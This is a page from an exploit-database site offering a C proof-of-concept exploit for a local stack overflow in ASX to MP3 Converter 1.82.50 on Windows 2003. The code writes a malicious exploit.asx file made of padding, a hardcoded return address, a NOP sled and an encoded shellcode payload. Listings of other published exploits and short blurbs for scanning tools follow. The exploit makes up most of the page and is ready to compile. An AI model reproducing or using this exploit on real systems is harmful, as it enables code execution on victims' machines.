Menu

Search for hundreds of thousands of exploits

"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow"

Author

Exploit author

"Ivan Ivanovic"

Platform

Exploit platform

windows

Release date

Exploit published date

2015-10-17

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
/*
ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
holahola ~ https://www.exploit-db.com/exploits/38382/
Winblows 2k3
*/

#include <stdio.h>
#include <windows.h>
#include <malloc.h>

int main() {

    int i;
    char *overwrite_offset = malloc(255);
    for(i = 0; i < 255; i += 5) {
        char padding[] = "\x41\x41\x41\x41\x41"; 
        memcpy(overwrite_offset + i, padding, strlen(padding));
    }
    memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1);

    char retn[] = "\x92\x72\x23\x74";
    char shellcode[] = 
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled
    "\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1"
    "\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7"
    "\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e"
    "\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e"
    "\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c"
    "\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2"
    "\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63"
    "\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1"
    "\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87"
    "\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b"
    "\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f"
    "\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c"
    "\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d"
    "\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15"
    "\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84"
    "\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3"
    "\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88"
    "\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0"
    "\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49"
    "\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0"
    "\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f"
    "\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98"
    "\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99"
    "\x30\xea\x7f\x0e\x30\x3f";

    int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode);
    char *buffer = malloc(buffer_size);

    memcpy(buffer, overwrite_offset, _msize(overwrite_offset));
    memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn));
    memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode));
    memset(buffer + buffer_size - 1, 0x00, 1);

    FILE * fp;
    fp = fopen("exploit.asx","w");
    fprintf(fp, buffer); 
    fclose(fp);

    return 0;

}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-03-04 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)" local windows "Ivan Ivanovic"
2017-10-27 "Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)" dos windows "Ivan Ivanovic"
2016-07-07 "Tiki Wiki 15.1 - File Upload" webapps php "Ivan Ivanovic"
2015-10-17 "ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow" local windows "Ivan Ivanovic"
2004-12-22 "Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)" remote windows "Ivan Ivanovic" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected